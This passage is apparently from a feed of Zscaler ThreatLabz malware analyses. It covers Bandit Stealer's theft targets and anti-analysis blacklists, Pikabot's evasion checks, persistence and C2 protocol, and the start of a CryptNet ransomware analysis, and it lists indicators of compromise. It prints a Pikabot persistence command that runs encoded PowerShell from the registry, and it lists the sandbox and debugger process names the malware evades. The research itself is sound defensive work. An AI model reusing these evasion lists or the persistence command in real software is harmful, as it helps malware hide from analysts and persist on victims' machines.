This information may help threat actors further identify analysis environments. In addition, Bandit uses an extensive list of IP addresses, MAC addresses, computer names, user names, process names to identify virtual environments and associate the environment with security vendors, and therefore avoid exhibiting any malicious behavior. The blacklist information is very similar to that of other prevalent open source stealers including Luna-Grabber, Kyoku-Cookie-Token-Stealer and Creal Stealer.
Bandit obtains the system’s external IP address from api.ipify.org and compares it with a list of blacklisted IP addresses shown in the Appendix. Some of these IP addresses belong to antivirus companies, which may be used to block signature updates.
Bandit stealer also retrieves the MAC address of the victim machine using the GetAdaptersAddresses Windows API and compares it with a blacklist shown in the Appendix. If there is a match, Bandit exits. Some of these MAC addresses are associated with virtualization software, so the purpose of the blacklist may be to evade malware sandboxes. Bandit Stealer also checks if the victim’s username and computer name are present in additional blacklists, which are obtained using “ cmd /c net session”.
The CreateToolhelp32Snapshot Windows API is used to capture the snapshot and traverse along the running process and matches with a list of blacklisted process names and terminates if any process is found executing in the memory shown in the Appendix.
Information Stealing Behavior
Bandit steals web browser data including saved login information, cookies, history, and credit card information stored in the browser’s user profile. Bandit targets a long list of browsers as shown in Table 1.
Yandex Browser
Iridium Browser
7Star Browser
Vivaldi Browser
Google Chrome
Orbitum
Sputnik
uCozMedia
Microsoft Edge
Torch Web Browser
Kometa Browser
CentBrowser
BraveSoftware
Amigo Browser
Epic Privacy Browser
SeaMonkey browser
QupZilla
Table 1: Web browsers targeted by Bandit Stealer
The SQLite3 library is used to fetch data and the CryptUnprotectData API is used to decrypt cookies and credentials. Credit card information is also stolen, which includes the name, expiration month, year and card number.
Bandit also targets desktop cryptocurrency wallets like Electrum, Exodus, MetaMask, Guarda, Binance, Ethereum as shown in Table 2.
Coinbase wallet extension
Saturn Wallet extension
Binance chain wallet extension
Coin98 Wallet
TronLink Wallet
multibit Bitcoin
Terra Station
Electron Cash
Guildwallet extension
Electrum-btcp
MetaMask extension
Bither Bitcoin wallet
ronin wallet extension
multidoge coin
Kardiachain wallet extension
LiteCoin
Jaxx liberty Wallet
Dash Wallet
Math Wallet extension
Ethereum
Bitpay wallet extension
Exodus
Nifty Wallet extension
Atomic
Armory
Bytecoin Wallet
Coinomi wallet
Monero wallet
dogecoin
Table 2: Cryptocurrency wallets targeted by Bandit Stealer
Bandit also has the capability to harvest keystrokes and steal clipboard data.
Recent samples of Bandit also target credentials in the following File Transfer Protocol Client (FTP) applications shown in Table 3.
BlazeFTP
NovaFTP
Staff-FTP
EasyFTP
DeluxeFTP
ALFTP
GoFTP
32BitFtp
Table 3: FTP client applications targeted by Bandit
Bandit also targets login information for the email clients shown in Table 4.
MailSpring
Mailbird
Opera Mail
Pocomail
Table 4: Email client applications targeted by Bandit
Stolen data is saved in various files inside a sub-folder in the %appdata%\local directory as shown in Figure 2. The sub-folder name is based on the country code and the IP address in the format [country_code][ip_address].
Figure 2: Example information collected by Bandit Stealer
The content of the USERINFO.txt contains a Bandit Stealer header followed by system information as shown in Figure 3.
Figure 3: Example content in the Bandit USERINFO.txt file
Network Communication
Bandit uses the cURL utility which is installed by default since Windows 10 v1803 to transfer data using HTTP, FTP, SMTP and more. Bandit stealer abuses pastebin.com for downloading the blacklist configuration information from a hardcoded URL as shown in Figure 4.
Figure 4: Bandit Stealer blacklist configuration downloaded from Pastebin
After Bandit finishes data collection, this information is sent to the threat actor via Telegram as shown in Figure 5.
Figure 5: Data stolen by Bandit sent to a Telegram channel
The Bandit threat actor has automated the parsing and extraction of the data and responds back with a JSON encoded structure as shown in Figure 6.
Figure 6: Example Bandit C2 response
Conclusion
Bandit Stealer is continuously updated with new features to enhance its data collection functionality. Most recently, Bandit has added support to steal FTP and email credentials. Bandit is also capable of expanding its anti-analysis features with a dynamic configuration downloaded from Pastebin. The abuse of Telegram as a C2 server has also become an increasingly popular technique to evade network-based signatures and make takedown efforts more difficult. All of these factors set up Bandit Stealer to be a potential threat for the foreseeable future.
Zscaler Coverage
Zscaler has ensured coverage for the payloads seen in these attacks via advanced threat signatures as well as Zscaler’s advanced cloud sandbox.
Figure 7: The Zscaler Cloud Sandbox successfully detected the malware
Zscaler's multilayered cloud security platform detects indicators at various levels, as shown below:
Win64_PWS_Bandit
Indicators Of Compromise (IOCs)
MD5 Hash Values
Description
17c697da407acacadcaa8fb5c4885179
Bandit Stealer
fdb111c9e0c6b1a94e2bf22131e4266d
Bandit Stealer
700e57847516d1f3e4ebf02e015e9f8d
Bandit Stealer
329562ce914d3d5998ac071333e43c1c
Bandit Stealer
4ab55868b65dc8f16d9d62edfd1893fa
Bandit Stealer
34323d65b744664567c06f8c6076a6b1
Bandit Stealer
2207a896e3e2ac5dae04643e56767dcd
Bandit Stealer
caf4884072724f1d75a6288f27e8e8fe
Bandit Stealer
Appendix
IP addresses blacklisted by Bandit Stealer
88.132.231.71
95.25.204.90
34.105.72.241
193.128.114.45
78.139.8.50
34.145.89.174
109.74.154.92
95.25.81.24
20.99.160.173
109.74.154.90
213.33.142.50
92.211.52.62
88.153.199.169
109.145.173.169
109.74.154.91
88.132.227.238
84.147.62.12
34.141.146.114
93.216.75.209
35.199.6.13
194.154.78.160
212.119.227.151
192.87.28.103
80.211.0.97
92.211.109.160
195.239.51.59
88.132.226.203
34.85.253.170
195.74.76.222
192.40.57.234
195.181.175.105
23.128.248.46
188.105.91.116
64.124.12.162
88.132.225.100
35.229.69.227
34.105.183.68
34.142.74.220
92.211.192.144
34.138.96.23
92.211.55.199
188.105.91.173
34.83.46.130
192.211.110.74
79.104.209.33
109.74.154.91
188.105.91.143
35.237.47.12
178.239.165.70
34.141.245.25
34.85.243.241
87.166.50.213
34.105.0.27
34.145.195.58
193.225.193.201
34.253.248.228
35.192.93.107
195.239.51.3
84.147.54.113
212.119.227.167
MAC addresses blacklisted by Bandit Stealer
00:15:5d:00:07:34
00:50:56:b3:14:59
16:ef:22:04:af:76
42:01:0a:8a:00:22
00:e0:4c:b8:7a:58
ea:02:75:3c:90:9f
00:15:5d:23:4c:ad
00:1b:21:13:32:51
00:0c:29:2c:c1:21
00:e0:4c:44:76:54
1a:6c:62:60:3b:f4
a6:24:aa:ae:e6:12
00:25:90:65:39:e4
ac:1f:6b:d0:4d:e4
00:15:5d:00:00:1d
08:00:27:45:13:10
c8:9f:1d:b6:58:e4
52:54:00:3b:78:24
00:50:56:a0:cd:a8
00:1b:21:13:26:44
00:25:90:36:65:0c
00:50:56:b3:50:de
00:50:56:b3:fa:23
3c:ec:ef:43:fe:de
00:15:5d:00:00:f3
7e:05:a3:62:9c:4d
52:54:00:a0:41:92
d4:81:d7:ed:25:54
2e:b8:24:4d:f7:de
52:54:00:b3:e4:71
00:50:56:b3:f6:57
00:25:90:36:65:38
00:15:5d:13:6d:0c
90:48:9a:9d:d5:24
00:e0:4c:56:42:97
00:03:47:63:8b:de
00:50:56:a0:dd:00
00:50:56:b3:3b:a6
ca:4d:4b:ca:18:cc
00:15:5d:00:05:8d
00:15:5d:13:66:ca
92:4c:a8:23:fc:2e
f6:a5:41:31:b2:78
00:0c:29:52:52:50
56:e8:92:2e:76:0d
5a:e2:a6:a4:44:db
d6:03:e4:ab:77:8e
00:50:56:b3:42:33
ac:1f:6b:d0:48:fe
00:50:56:ae:6f:54
00:50:56:ae:b2:b0
3c:ec:ef:44:01:0c
00:e0:4c:94:1f:20
42:01:0a:96:00:33
00:50:56:b3:94:cb
06:75:91:59:3e:02
00:15:5d:00:05:d5
00:50:56:97:a1:f8
42:01:0a:8e:00:22
42:01:0a:8a:00:33
00:e0:4c:4b:4a:40
5e:86:e4:3d:0d:f6
00:50:56:b3:4c:bf
ea:f6:f1:a2:33:76
42:01:0a:8a:00:22
00:50:56:b3:ea:ee
00:50:56:b3:09:9e
ac:1f:6b:d0:4d:98
00:1b:21:13:15:20
3e:53:81:b7:01:13
00:50:56:b3:38:88
1e:6c:34:93:68:64
00:15:5d:00:06:43
00:50:56:97:ec:f2
00:50:56:a0:d0:fa
00:50:56:a0:61:aa
00:15:5d:1e:01:c8
00:e0:4c:b3:5a:2a
00:50:56:b3:91:c8
42:01:0a:96:00:22
00:50:56:b3:38:68
12:f8:87:ab:13:ec
3e:c1:fd:f1:bf:71
00:50:56:b3:21:29
60:02:92:3d:f1:69
00:50:56:a0:38:06
00:50:56:a0:6d:86
00:15:5d:00:00:b3
00:e0:4c:7b:7b:86
2e:62:e8:47:14:49
00:50:56:a0:af:75
96:2b:e9:43:96:76
00:e0:4c:46:cf:01
00:0d:3a:d2:4f:1f
00:50:56:b3:dd:03
b4:a9:5a:b1:c6:fd
42:85:07:f4:83:d0
60:02:92:66:10:79
c2:ee:af:fd:29:21
d4:81:d7:87:05:ab
56:b0:6f:ca:0a:e7
00:50:56:a0:d7:38
00:50:56:b3:ee:e1
ac:1f:6b:d0:49:86
12:1b:9e:3c:a6:2c
be:00:e5:c5:0c:e5
00:50:56:a0:84:88
52:54:00:8b:a6:08
00:15:5d:00:1c:9a
00:50:56:a0:59:10
00:1b:21:13:32:20
00:0c:29:05:d8:6e
00:15:5d:00:1a:b9
00:50:56:a0:06:8d
3c:ec:ef:44:00:d0
00:23:cd:ff:94:f0
b6:ed:9d:27:f4:fa
00:e0:4c:cb:62:08
00:50:56:ae:e5:d5
00:e0:4c:d6:86:77
00:15:5d:00:01:81
4e:81:81:8e:22:4e
00:50:56:97:f6:c8
3c:ec:ef:44:01:aa
4e:79:c0:d9:af:c3
08:00:27:3a:28:73
52:54:00:ab:de:59
00:15:5d:23:4c:a3
00:15:5d:b6:e0:cc
00:15:5d:00:00:c3
00:50:56:b3:9e:9e
00:1b:21:13:33:55
00:15:5d:00:02:26
00:50:56:a0:45:03
00:50:56:a0:39:18
00:15:5d:00:00:a4
00:50:56:b3:05:b4
12:8a:5c:2a:65:d1
32:11:4d:d0:4a:9e
00:50:56:ae:5d:ea
1c:99:57:1c:ad:e4
00:25:90:36:f0:3b
00:50:56:b3:d0:a7
94:de:80:de:1a:35
00:1b:21:13:21:26
Hardware IDs blacklisted by Bandit Stealer
7AB5C494-39F5-4941-9163-47F54D6D5016
050C3342-FADD-AEDF-EF24-C6454E1A73C9
BB233342-2E01-718F-D4A1-E7F69D026428
79AF5279-16CF-4094-9758-F88A616D81B4
03DE0294-0480-05DE-1A06-350700080009
4DC32042-E601-F329-21C1-03F27564FD6C
9921DE3A-5C1A-DF11-9078-563412000026
FF577B79-782E-0A4D-8568-B35A9B7EB76B
11111111-2222-3333-4444-555555555555
DEAEB8CE-A573-9F48-BD40-62ED6C223F20
CC5B3F62-2A04-4D2E-A46C-AA41B7050712
08C1E400-3C56-11EA-8000-3CECEF43FEDE
6F3CA5EC-BEC9-4A4D-8274-11168F640058
05790C00-3B21-11EA-8000-3CECEF4400D0
00000000-0000-0000-0000-AC1F6BD04986
6ECEAF72-3548-476C-BD8D-73134A9182C8
ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548
5EBD2E42-1DB8-78A6-0EC3-031B661D5C57
C249957A-AA08-4B21-933F-9271BEC63C85
49434D53-0200-9036-2500-369025003865
4C4C4544-0050-3710-8058-CAC04F59344A
9C6D1742-046D-BC94-ED09-C36F70CC9A91
BE784D56-81F5-2C8D-9D4B-5AB56F05D86E
119602E8-92F9-BD4B-8979-DA682276D385
00000000-0000-0000-0000-AC1F6BD04972
907A2A79-7116-4CB6-9FA5-E5A58C4587CD
ACA69200-3C4C-11EA-8000-3CECEF4401AA
12204D56-28C0-AB03-51B7-44A8B7525250
00000000-0000-0000-0000-000000000000
A9C83342-4800-0578-1EE8-BA26D2A678D2
3F284CA4-8BDF-489B-A273-41B44D668F6D
921E2042-70D3-F9F1-8CBD-B398A21F89C6
5BD24D56-789F-8468-7CDC-CAA7222CC121
D7382042-00A0-A6F0-1E51-FD1BBF06CD71
BB64E044-87BA-C847-BC0A-C797D1A16A50
D8C30328-1B06-4611-8E3C-E433F4F9794E
49434D53-0200-9065-2500-65902500E439
1D4D3342-D6C4-710C-98A3-9CC6571234D5
2E6FB594-9D55-4424-8E74-CE25A25E36B0
00000000-0000-0000-0000-50E5493391EF
49434D53-0200-9036-2500-36902500F022
CE352E42-9339-8484-293A-BD50CDC639A5
42A82042-3F13-512F-5E3D-6BF4FFFD8518
00000000-0000-0000-0000-AC1F6BD04D98
777D84B3-88D1-451C-93E4-D235177420A7
60C83342-0A97-928D-7316-5F1080A78E72
38AB3342-66B0-7175-0B23-F390B3728B78
4CB82042-BA8F-1748-C941-363C391CA7F3
49434D53-0200-9036-2500-369025000C65
02AD9898-FA37-11EB-AC55-1D0C0A67EA8A
48941AE9-D52F-11DF-BBDA-503734826431
B6464A2B-92C7-4B95-A2D0-E5410081B812
B1112042-52E8-E25B-3655-6A4F54155DBF
DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F
032E02B4-0499-05C3-0806-3C0700080009
FA8C2042-205D-13B0-FCB5-C5CC55577A35
00000000-0000-0000-0000-AC1F6BD048FE
FED63342-E0D6-C669-D53F-253D696D74DA
DD9C3342-FB80-9A31-EB04-5794E5AE2B4C
C6B32042-4EC3-6FDF-C725-6F63914DA7C7
EB16924B-FB6D-4FA1-8666-17B91F62FB37
2DD1B176-C043-49A4-830F-C623FFB88F3C
E08DE9AA-C704-4261-B32D-57B2A3993518
FCE23342-91F1-EAFC-BA97-5AAE4509E173
A15A930C-8251-9645-AF63-E45AD728C20C
4729AEB0-FC07-11E3-9673-CE39E79C8A00
07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9
CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F
67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3
84FE3342-6C67-5FC6-5639-9B3CA3D775A1
88DC3342-12E6-7D62-B0AE-C80E578E7B07
365B4000-3B25-11EA-8000-3CECEF44010C
C7D23342-A5D4-68A1-59AC-CF40F735B363
DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D
5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E
63FA3342-31C7-4E8E-8089-DAFF6CE5E967
63203342-0EB0-AA1A-4DF5-3FB37DBB0670
CEFC836C-8CB1-45A6-ADD7-209085EE2A57
96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE
8DA62042-8B59-B4E3-D232-38B29A10964A
44B94D56-65AB-DC02-86A0-98143A7423BF
A7721742-BE24-8A1C-B859-D7F8251A83D3
0934E336-72E4-4E6A-B3E5-383BD8E938C3
3A9F3342-D1F2-DF37-68AE-C10F60BFB462
6608003F-ECE4-494E-B07E-1C4615D1D93C
3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E
12EE3342-87A2-32DE-A390-4C2DA4D512E9
F5744000-3C78-11EA-8000-3CECEF43FEFE
D9142042-8F51-5EFF-D5F8-EE9AE3D1602A
D2DC3342-396C-6737-A8F6-0C6673C1DE08
38813342-D7D0-DFC8-C56F-7FC9DFE5C972
AF1B2042-4B90-0000-A4E4-632A1C8C7EB1
49434D53-0200-9036-2500-369025003AF0
EADD1742-4807-00A0-F92E-CCD933E9D8C1
FE455D1A-BE27-4BA4-96C8-967A6D3A9661
4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27
8B4E8278-525C-7343-B825-280AEBCD3BCB
Usernames blacklisted by Bandit Stealer
WDAGUtilityAccount
server
8VizSM
Abby
BvJChRPnsxn
w0fjuOVmCcP5A
hmarc
Harry Johnson
lmVwjj9b
patex
SqgFOf3G
PqONjHVwexsS
RDhJ0CNFevzX
Lucas
3u2v9m8
kEecfMwgj
mike
Julia
Frank
PateX
HEUeRzl
8Nl0ColNQ5bq
h7dk1xPr
fred
Lisa
Louise
RGzcBUyrznReg
John
User01
PxmdUOpVyx
george
test
Computer names blacklisted by Bandit Stealer
BEE7370C-8C0C-4
WILEYPC
DESKTOP-CBGPFEE
DESKTOP-NAKFFMT
WORK
SERVER-PC
WIN-5E07COS9ALR
6C4E733F-C2D9-4
TIQIYLA9TW5M
B30F0242-1C6A-4
RALPHS-PC
DESKTOP-KALVINO
DESKTOP-VRSQLAG
DESKTOP-WG3MYJS
COMPNAME_4047
Q9IATRKPRH
DESKTOP-7XC6GEZ
DESKTOP-19OLLTD
XC64ZB
DESKTOP-5OV9S0O
DESKTOP-DE369SE
DESKTOP-D019GDM
QarZhrdBpj
EA8C2E2A-D017-4
DESKTOP-WI8CLET
ORELEEPC
AIDANPC
SERVER1
ARCHIBALDPC
LUCAS-PC
LISA-PC
JULIA-PC
MARCI-PC
JOHN-PC
d1bnJkfVlH
DESKTOP-1PYKP29
DESKTOP-B0T93D6
NETTYPC
DESKTOP-1Y2433R
DESKTOP-BUGIO
Process names blacklisted by Bandit Stealer
httpdebuggerui
vmwareuser
wireshark
vgauthservice
fiddler
vmacthlp
regedit
x96dbg
cmd
vmsrvc
taskmgr
x32dbg
vboxservice
vmusrvc
df5serv
prl_cc
processhacker
prl_tools
vboxtray
xenservice
vmtoolsd
qemu-ga
vmwaretray
joeboxcontrol
ida64
ksdumperclient
ollydbg
ksdumper
pestudio
joeboxserver
Sat, 03 Jun 2023 12:44:10 -0700Mallikarjun Piddannavar https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealerTechnical Analysis of Pikabot
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
Key Takeaways
Pikabot is a new malware trojan that emerged in early 2023 that consists of two components: a loader and a core module.
The core module implements the malicious functionality that includes the ability to execute arbitrary commands and inject payloads that are provided by a command-and-control server.
Pikabot utilizes a code injector to decrypt and inject the core module.
The core module and its injector use a series of anti-analysis techniques. In addition, they use the public tool ADVobfuscator for string obfuscation.
Pikabot shares similarities with the Qakbot trojan including the distribution methods, campaigns, and malware behaviors.
Pikabot is a malicious backdoor that has been active since early 2023. The malware is modular with a loader and a core component that implements the majority of the functionality. Pikabot is capable of receiving commands from a command-and-control server such as the injection of arbitrary shellcode, DLLs or executable files. Zscaler Threatlabz has observed Pikabot being used to distribute Cobalt Strike.
The Pikabot malware author has added a number of anti-analysis techniques to thwart automated analysis in sandbox and research environments. The code checks for the presence of debuggers, breakpoints, and system information including memory and the number of processors. Pikabot also uses the ADVobfuscator library to encrypt important strings used by the malware.
Threatlabz has noticed some resemblances between Pikabot and Qakbot including the method of distribution, behavior, and internal campaign identifiers. However, there is not sufficient evidence at this time to definitively link these malware families to the same threat actor.
Technical Analysis
In the following sections, we focus on Pikabot’s core module and its injector since the downloader does not contain any functionality/features worth mentioning.
Core Module Injector
Pikabot uses an injector to run a series of anti-analysis tests and then decrypt and inject the core module payload. If any of these tests fail, Pikabot will terminate execution. ThreatLabz has identified the following anti-analysis methods implemented by the injector:
Exception Handlers by using int 2d and int 3 instructions to raise them.
Reading the BeingDebugged flag of the process environment block (PEB).
Use of the Windows API function Beep to delay the execution.
Attempt to load junk and incorrect libraries in order to detect sandboxes. This code appears to be copied from https://github.com/CheckPointSW/Evasions/blob/master/_techniques/processes.md.
Use of the Windows API functions CheckRemoteDebuggerPresent and IsDebuggerPresent for debugger detection.
The value of the NtGlobalFlag in the PEB that indicates a debugger is present.
Use of the Windows API function NtQueryInformationProcess with the classes ProcessDebugPort and ProcessDebugFlags.
Use of the GetWriteWatch API. The implementation seems to have been copied from here: https://github.com/BaumFX/cpp-anti-debug/blob/master/anti_debug.cpp#L260
Use of the OutputDebugString function in order to detect a debugger. The implementation has been copied from here: https://github.com/BaumFX/cpp-anti-debug/blob/master/anti_debug.cpp#L456
Check the number of processors, which should be greater than or equal to 2.
Use of the rdtsc instruction to check for single stepping during debugging.
The system random access memory (RAM) must be greater than 2GB.
Detection of hardware breakpoints.
Detection by checking the trap flag via __readeflags.
ANALYST NOTE: It should be noted that the use of exceptions is used in many parts of the code, for example, during the decryption of the core payload.
The injector decrypts the core module as follows:
Loads a set of PNG images, which are stored in the resources section (RCDATA), and decrypts them using a bitwise XOR operation with a hardcoded 32-byte key. Note that each PNG image holds an encrypted chunk of the core module.
Decrypt the XOR decrypted data using AES (CBC mode) with the same 32-byte key and use the first 16 bytes of the encrypted data as an initialization vector (IV).
Once the core payload has been decrypted, the Pikabot injector creates a process with a specified file path (e.g. WerFault) and injects the core module into it. Finally, the Pikabot injector sets the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON flag in order to protect the injected process from non-signed Microsoft binaries.
Core Module
In the following sections, the core module is analyzed with samples compiled in May 2023.
Anti-Analysis
Similar to the injector, the Pikabot core module performs additional anti-analysis checks. One notable technique is a “sleep” function, which Pikabot uses to delay execution. Instead of using common Windows API functions, Pikabot uses the NtContinue API function in order to set a timer. The technique is not new and it is similar to other proof-of-concepts implementations.
In addition to the tests above, Pikabot stops execution if the system's language is any of the following:
Georgian (Georgia)
Kazakh (Kazakhstan)
Uzbek (Cyrillic)
Tajik (Tajikistan)
Russian (Russia)
Ukrainian (Ukraine)
Belarusian (Belarus)
Slovenian (Slovenia)
This check is common for many threat actors that originate from countries in the Commonwealth of Independent States (CIS) to reduce the chances of criminal prosecution.
Persistence
Pikabot uses two methods to add persistence on a host:
Upon execution, Pikabot retrieves its current execution folder and checks if it is located in the AppData folder under a hardcoded folder name (might differ from sample to sample).
If Pikabot is not run from this specific file path, then it will add persistence on the compromised host by creating a new value with its file path in the Run registry key (the key name is hardcoded in the binary). On top of that, Pikabot corrupts the current executable file by replacing it with its PE header (512 bytes length) followed by null bytes (3,584 bytes in length).
Pikabot downloads a PowerShell script from the command-and-control server and stores it in HKEY_CURRENT_USER\Software\predefined_name, where predefined_name is a hardcoded string in the binary file. Additionally, it stores the encrypted command-and-control servers in the same registry path.
Lastly, Pikabot sets a value in the Run registry key to execute a command line that invokes this PowerShell script (e.g., cmd /q /c start /min " powershell "$cimeter = Get-ItemProperty -Path HKCU:\Software\cimeter; powershell -encodedcommand $cimeter.unbevelledHamuli")
ANALYST NOTE: Pikabot also has the option to directly execute a downloaded file instead of using this persistence mechanism (Even though this is not currently being used).
Command-and-Control Configuration
Pikabot does not store the command-and-control information in a single block (e.g. as Qakbot does). Instead, each component (e.g. URIs) is encrypted using ADVobfuscator and the command-and-control server IP addresses and ports are further decrypted during runtime using the following algorithm. Firstly, Pikabot decrypts a string that includes a set of Base64 encoded strings. Then it parses the string using the delimiter '&' and decrypts the contents by following the below steps:
Read the first 32 bytes of the string and use them as an AES key.
Decode the rest of the string using Base64.
Read the first 16 bytes of the decoded string and use them as an IV.
Read the rest of the decoded data and decrypt it using AES (CBC mode).
The decrypted output is a Base64 string, which results in the command-and-control server IP address and corresponding port. Note that many of the Pikabot command-and-control servers listen on ports that are identical to the ports used by Qakbot’s proxy module such as 1194, 2078, and 2222.
There have been some minor changes over the last few months in the way that Pikabot command-and-control servers have been stored. For example, in previous versions, the command-and-control servers were only encoded using Base64 and no further encryption or parsing was required.
Pikabot also appears to contain a campaign ID and binary version in each sample. These can be observed during the network communication, where the JSON data has the keys "version" and "stream". The latter appears to be a campaign ID. An example request (before encryption) containing these values is shown below:
{"uuid": "F37670100000074E33652510483", "stream": "BB1@T@2e88e610b66b4205853b211f21873208", "os_version": "Win 10.0 19050", "product_number": 161, "username": "test", "pc_name": "DESKTOP-TEST", "cpu_name": "11th Gen Intel(R) Core(TM)", "pc_uptime": 29884462, "gpu_name": "GPU_NAME", "ram_amount": 8096, "screen_resolution": "1560x1440", "version": "0.5.3", "domain_name": "", "domain_controller_name": "unknown", "domain_controller_address": "unknown", "knock_timeout": 254, "is_elevated": 0}
The campaign ID values observed by Threatlabz are particularly interesting because of the prefixes BB1 and eu_bb_0. These resemble some of the campaign IDs that have been observed in Qakbot binaries, which frequently contain the prefix BB followed by an integer.
Network communication
Pikabot starts by registering the compromised host with the command-and-control servers. The registration process involves collecting system information and reporting it to the command-and-control server with an HTTPS POST request. A variety of data is collected such as the following:
Network information by executing the command ipconfig.exe /all
User/groups information by executing whoami.exe /all
Windows build information.
Generic host information (e.g. available RAM, screen resolution)
Domain controllers information.
Similar to other botnets, Pikabot generates a unique bot identifier for the compromised host. The algorithm, which Pikabot uses to generate the bot identifier can be replicated in Python using the code here.
Once the registration procedure has been completed and persistence to the compromised host has been established, Pikabot starts requesting tasks from the server. Pikabot supports the following command types:
task - a command to execute
knock - a keep-alive message
The tasks that Pikabot currently supports are described in Table 1.
Task Name
Description
cmd
Executes a shell command via cmd.exe.
destroy
Exits the current process.
shellcode
Injects and executes downloaded shellcode.
dll
Injects a downloaded DLL file.
exe
Injects a downloaded EXE file.
additional
Collects additional host information by executing one of the commands in Table 2.
knock_timeout
Updates the timer value, which indicates how often Pikabot should send a knock request.
Table 1 - Pikabot tasks description
Pikabot also supports the “additional” commands shown in Table 2, which are focused on collecting further system information.
Command
Description
screenshoot
Not implemented.
whoami
Executes the shell command whoami /all.
ipconfig
Executes the shell command ipconfig /all.
processes
Collects process information.
Table 2 - Additional Pikabot commands description
It is worth noting that depending on the network request, Pikabot uses a different URI (which may differ among samples). For example, for reporting a command output, the URI may be Duenna/ZuGAYDS3Y2BeS2vW7vm?AnacrusisCrotalinae=zH4Tfz.
The network data encryption procedure is similar to the configuration's decryption process. Pikabot encrypts a network request by following the steps below:
The request data is encoded using Base64.
Pikabot generates a random 32-byte key and encodes the data again using Base64.
Pikabot reads the first 16-bytes of a function prologue and uses these bytes as an IV.
The data is encrypted using AES (CBC mode) and encoded with Base64.
The 32-byte key is prepended to the encoded data.
The hardcoded URI key (e.g. mMG50=) is prepended to the final output.
Cloud Sandbox
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:
Win32.Trojan.PikaBot
Conclusion
Overall, Pikabot is a new malware family that implements an extensive set of anti-analysis techniques and offers common backdoor capabilities to load shellcode and execute arbitrary second-stage binaries. Pikabot may have potential ties to Qakbot with some commonalities in the distribution, design, and campaign identifiers. However, ThreatLabz has not established a definitive link yet between the two malware families.
Indicators Of Compromise (IOCs)
Host Indicators
SHA256 Hash
Description
92153e88db63016334625514802d0d1019363989d7b3f6863947ce0e490c1006
Pikabot Injector/Core module
a48c39cc45efea110a7c8edadcb6719f5d1ebbeebb570b345f47172d393c0821
Pikabot Injector/Core module
8ee9141074b48784c89aa5d3cd4010fcf4e6d467b618c8719970f78fcc24a365
Pikabot Injector/Core module
a9db5aca01499f6ce404db22fb4ba3e4e0dc4b94a41c805c520bd39262df1ddc
Pikabot Injector/Core module
347e2f0d8332dd2d9294d06544c051a302a2436da453b2ccfa2d7829e3a79944
Pikabot Injector/Core module
Network Indicators
IOC
Description
hxxps://129.153[.]135.83:2078
Command-and-Control server
hxxps://132.148.79[.]222:2222
Command-and-Control server
hxxps://45.154.24[.]57:2078
Command-and-Control server
hxxps://45.85.235[.]39:2078
Command-and-Control server
hxxps://94.199.173[.]6:2222
Command-and-Control server
Wed, 24 May 2023 08:10:11 -0700Brett Stone-Grosshttps://www.zscaler.com/blogs/security-research/technical-analysis-pikabotTechnical Analysis of CryptNet Ransomware
https://www.zscaler.com/blogs/security-research/technical-analysis-cryptnet-ransomware
Key Takeaways
CryptNet is a new ransomware-as-a-service that has been advertised in underground forums since at least April 2023
The CryptNet threat group claims to perform double extortion attacks by combining data exfiltration with file encryption
The ransomware code is written in the .NET programming language
CryptNet uses 256-bit AES in CBC mode and 2048-bit RSA to encrypt files
The CryptNet ransomware codebase is closely related to Chaos ransomware
Zscaler ThreatLabz has been tracking a new ransomware group known as CryptNet that emerged in April 2023. The group claims to exfiltrate data prior to performing file encryption and hosts a data leak site hosted on a Tor hidden service that currently contains two victims. The group operating the ransomware is also actively recruiting affiliates on criminal forums to conduct breaches. The CryptNet ransomware code is written in .NET and obfuscated using .NET Reactor. After removing the obfuscation layer, CryptNet shares many resemblances to the Chaos ransomware families and the latest variant that is known as Yashma. The code similarities include the encryption methods, capabilities to disable backup services and delete shadow copies. CryptNet appears to have streamlined the Yashma code to improve the file encryption performance.
In this blog, we will analyze the features of CryptNet and the close relationship with Yashma ransomware.
Technical Analysis
Obfuscation
The CryptNet sample analyzed by ThreatLabz was obfuscated using Eziriz's .NET Reactor. The tool NetReactorSlayer is easily able to remove the control flow and symbols obfuscation layers, but the ransomware’s important strings remain obfuscated in a resource section, which is encrypted using a custom algorithm as shown in Figure 1.
Figure 1. Example CryptNet string decryption algorithm
ThreatLabz has reimplemented this custom encryption algorithm in Python here.
After decryption, the strings are stored sequentially with each string preceded by a DWORD value (in little endian) representing its size (in red) as shown in Figure 2.
Figure 2. Decrypted .NET Reactor strings data structure
CryptNet then accesses each string by an offset into this structure.
Decryption ID
One of the first actions taken by the ransomware is to generate a decryption ID that will be added to the ransom note as shown in Figure 3.
Figure 3. CryptNet decryption ID generation
The decryption ID is composed of two hardcoded characters followed by 28 pseudorandom characters followed by two more hardcoded characters. Therefore, every encrypted system will have a unique decryption ID, although the victim can be determined by the hardcoded prefix and suffix characters.
File Encryption
After the victim ID is generated, the ransomware will start the main encryption routine as shown in Figure 4.
Figure 4. Main CryptNet encryption routine
CryptNet will first loop through all directories for each drive letter, excluding those shown in Table 1.
windows.old
windows.old.old
amd
nvidia
program files
program files (x86)
windows
$recycle.bin
documents and settings
intel
perflogs
programdata
boot
games
msocach
Table 1. Directories excluded by CryptNet from file encryption
The following file names in Table 2 are also excluded from file encryption.
iconcache.db
autorun.inf
thumbs.db
boot.ini
bootfont.bin
ntuser.ini
bootmgr
bootmgr.efi
bootmgfw.efi
desktop.ini
ntuser.dat
Table 2. File names excluded by CryptNet from file encryption
CryptNet will encrypt all files that match the following extensions in Table 3.
.myd
.ndf
.qry
.sdb
.sdf
.tmd
.tgz
.lzo
.txt
.jar
.dat
.contact
.settings
.doc
.docx
.xls
.xlsx
.ppt
.pptx
.odt
.jpg
.mka
.mhtml
.oqy
.png
.csv
.py
.sql
.indd
.cs
.mp3
.mp4
.dwg
.zip
.rar
.mov
.rtf
.bmp
.mkv
.avi
.apk
